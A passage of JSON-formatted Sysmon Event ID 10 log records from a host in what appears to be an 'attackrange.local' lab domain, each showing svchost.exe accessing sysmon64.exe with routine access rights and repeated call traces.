06:55:58.955","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6228,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:58.955\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:58.955","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6229,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:58.955\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:58.955","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6230,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:58.955\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:58.955","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6231,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:58.955\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:58.955","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6232,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:58.955\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:58.955","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6233,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:58.955\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:58.955","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6234,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:58.955\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:58.955","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6235,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:58.955\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 